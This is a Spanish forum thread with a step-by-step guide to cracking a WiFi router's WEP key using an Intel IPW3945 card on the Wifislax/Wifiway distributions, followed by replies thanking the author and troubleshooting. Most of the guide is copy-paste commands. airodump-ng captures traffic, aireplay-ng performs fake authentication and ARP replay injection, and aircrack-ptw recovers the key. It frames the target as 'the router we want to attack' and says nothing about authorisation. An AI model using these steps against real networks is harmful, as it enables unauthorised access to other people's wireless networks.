Suite Seguridad Wireless > Manuales de Wifislax & Wifiway
Paso a paso como inyectar con IPW3945
emudem:
Actualizado el 27 Junio 2008
Bueno deciros que con copiar y pegar inyectareis:
Es necesario tener en cuenta la siguiente lista para que todo vaya bien:
-Tener la tarjeta wifi Intel IPW3945 no sirven modelos superiores.
-A ser posible que sea en portatil (no conozco esta tarjeta wifi en los sobremesa... pero por si acaso)
-Tener buena calidad de señal ya que si la señal es débil no inyectareis.
-Se han dado casos que con buena señal no se inyectaba, el problema se suele resolver moviendo el portatil hacia otro lugar para evitar interenferencias con otros aparatos que esten por los 2.4gz que usa el wifi. (microhondas...) Además la IPW3945 flojea un poco a la hora de enviar datos por lo que puedes tener 90% recibiendo y 10% enviando.
Descargar WIFIWAY 0.4 - WIFIWAY 0.6 - WIFIWAY 0.8 de nuestro amigo Hwagm o el WIFISLAX 3.1
PASOS
Abrimos una consola
--- Código: ---kwrite /sys/class/net/wifi0/device/channel
--- Fin del código ---
Importante: El canal AP debe corresponder al mismo canal del router que queremos atacar, eso lo podeis ver cuando ejecutáis vuestro sistema operativo y buscais redes wifi.
Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de acceso cuando ejecutes airodump, guardamos y cerramos. Los canales oscilan de 1 a 13 aunque en algunas ocasiones he visto mas de 13.
Cogemos el BSSID del AP (router)
--- Código: ---airodump-ng wifi0
--- Fin del código ---
Una vez aparezcan los BSSID pulsamos CTRL+C (para parar el proceso)
--- Código: ---kwrite /sys/class/net/wifi0/device/bssid
--- Fin del código ---
Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.
--- Código: ---airodump-ng -c CANAL DEL AP -w DATOS wifi0
--- Fin del código ---
Abrimos otra consola
--- Código: ---kwrite /sys/class/net/wifi0/device/rate
--- Fin del código ---
Lo ponemos a 2, guardamos y cerramos.
Para ahorrarnos estos pasos os podeis DESCARGAR EL SIGUIENTE SCRIPT solo válido para la distribución de wifiway.
Para ejecutarlo poner en consola (shell) y seguir los pasos.
--- Código: ---./ipw3945.sh
--- Fin del código ---
Seguimos con la inyección, levantamos la interfaz wifi
--- Código: ---ifconfig wifi0 up
--- Fin del código ---
Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr cambiamos los " - " por " : " (guiones por dos puntos)
Ejemplo: 12-58-47-FD-AD-8F-00-00-00-00 se cambia por 12:58:47:FD:AD:8F
--- Código: ---ifconfig
--- Fin del código ---
--- Código: ---aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
--- Fin del código ---
También podeis poner
--- Código: ---aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0
--- Fin del código ---
de esta manera se asocia automáticamente cada 10 segundos para aquellos que pillais alguna ARP y luego no suben.
Una vez autentificados abrimos otra consola y ponemos
--- Código: ---aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0
--- Fin del código ---
Esperamos un rato como mucho 15 minutos y veréis como suben los ARP.
El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.
Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
--- Código: ---aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
--- Fin del código ---
Y lo ejecutáis de nuevo hasta que os autentifique o se os suban los ARP.
Si no autentifica fijaros que el RXQ (airodump-ng) se mantenga por encima del 50% de no ser así los DATA no subirán rápido, normalmente es debido a que el ARP se encuentra demasiado lejos.
Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejecutamos en otra consola.
--- Código: ---aircrack-ptw DATOS-01.cap
--- Fin del código ---
No es necesario parar los procesos para buscar la clave, puede seguir subiendo DATA por si acaso no encuentra la clave WEP y volver a intentarlo más adelante por ejemplo con 150.000 DATA
Al cabo de un rato (un minuto como máximo) os saldrá KEY FOUND con la clave wep.
Salu2 ;)
emudem:
Video grabado por mi movil w800i perdonen la calidad pero al menos se ve todo el proceso.
VIDEO IPW3945 INYECTANDO
Hwagm:
jejje, gracias.
Ya tenemos fichada tu mac de la tarjeta, como son unicos ya sabemos todo tu historial laboral, jejej.
Con una camara mas profesional hubiera sido la ostia.
Pero esta claro que es el 1 video de una ipw3945 inyectando. ;)
juanjetomas:
Gracias amigo, muy buen manual por fin he podido inyectar ;D ;D ;D
Os cuento, pillo 3 apr, y aireplay se lia a enviar paquetes como loco, lo que pasa, es que en airodump las datas no suben. Suben los paquetes de airodump, pero no las datas
En 30 minutos he pillado 420000 paquetes.
Además, si intento abrir el fichero con aircrack-ng, poniendo :
--- Código: ---aircrack-ng NOMBRE_DEL_FICHERO
--- Fin del código ---
Me dice que no lo encuentra, y si pongo
--- Código: ---aircrack-ng *.cap
--- Fin del código ---
Pues me dice que no tengo suficientes ivs, normal ¿no?
Y además, si pongo
--- Código: ---aircrack-ptw NOMBRE_DEL_FICHERO
--- Fin del código ---
Me dice que no lo encuentra
¿Alguien sabe el motivo de esto?
emudem:
--- Cita de: Hwagm en 05-05-2007, 23:00 (Sábado) ---jejje, gracias.
Ya tenemos fichada tu mac de la tarjeta, como son unicos ya sabemos todo tu historial laboral, jejej.
Con una camara mas profesional hubiera sido la ostia.
Pero esta claro que es el 1 video de una ipw3945 inyectando. ;)
--- Fin de la cita ---
Ya se las consecuencias de enseñar la mac de mi tarjeta, total mientras sea mia y como yo no tengo problema en publicarla pues.... ;)
Lo unico que queria es capturar la inyeccion de la ipw3945 de manera visual, intentaré pillarme una camara de dvd o aprender a usar el capturador de pantallas en linux.
juanjetomas por msn me explicas que te ocurre y seguimos con la tarea, poco a poco vas progresando y veras como al final lo consigues :D
Navegación
[#] Página Siguiente
Ir a la versión completa